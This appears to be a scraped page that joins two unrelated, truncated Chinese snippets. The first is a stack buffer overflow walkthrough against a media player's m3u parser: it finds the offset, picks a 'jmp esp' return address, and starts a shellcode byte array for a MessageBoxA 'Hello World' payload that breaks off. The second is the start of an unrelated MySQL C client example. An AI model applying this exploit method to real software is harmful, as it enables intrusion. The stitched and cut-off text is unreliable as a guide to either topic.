fprintf

FirstBlood 程序情况：小道消息对m3u文件分析，当m3u文件输入很多字符的时候程序会崩溃。 1.用二分法跟字符串定位溢出点。 2.搜索所有模块-命令-jmp esp 找个顺眼的放入溢出地址，下断点，将这个地址填入溢出点后，程序溢出就会在这个地址断下。 //MessageboxA弹出Helloworld源码char bShellcode[] = "\x83\xEC\x20\xEB\x4D\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65\x73\x73\x00\x4C\x6F\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x45\x78\x41\x00\x55\x73\x65\x72\x33\x32\x2E\x64\x6C\x6C\x00\x4D\x65\x73\x73\x61\x67\x65\x42\x6F\x78\x41\x00\x45\x78\x69\x74\x50\x72\x6F\x63\x65\x73\x73\x00\x48\x65\x6C\x6C\x6F\x20\x57\x6F\x72\x6C\x64\x00\xE8\x00\x00\x00\x00\x5B\x64\x8B\x35\x30\x00\x00\x00\x8B\x76\x0C\x8B\x76\x1C\x8B\x36\x8B\x56

原文： http://www.cnblogs.com/wangkangluo1/archive/2012/07/01/2571800.html mysql 使用的是xampp 需要指定sock 源码：main.c #if defined(_WIN32) || defined(_WIN64) // 为了支持windows平台上的编译 #include <windows.h> #endif #include <stdio.h> #include <stdlib.h> #include <mysql/mysql.h> // 我的机器上该文件在/usr/local/include/mysql下 // 定义数据库操作的宏，也可以不定义留着后面直接写进代码 #define SELECT_QUERY "select username from test where userid = %d" int main( int argc, char **argv) // char **argv 相当于 char *argv[] { MYSQL mysql, *sock; // 定义数据库连接的句柄，它被用于几乎所有的MySQL函数 MYSQL_RES *res; // 查询结果集，结构类型 MYSQL_FIELD *fd ; // 包含字段信息的结构 MYSQL_ROW row ; //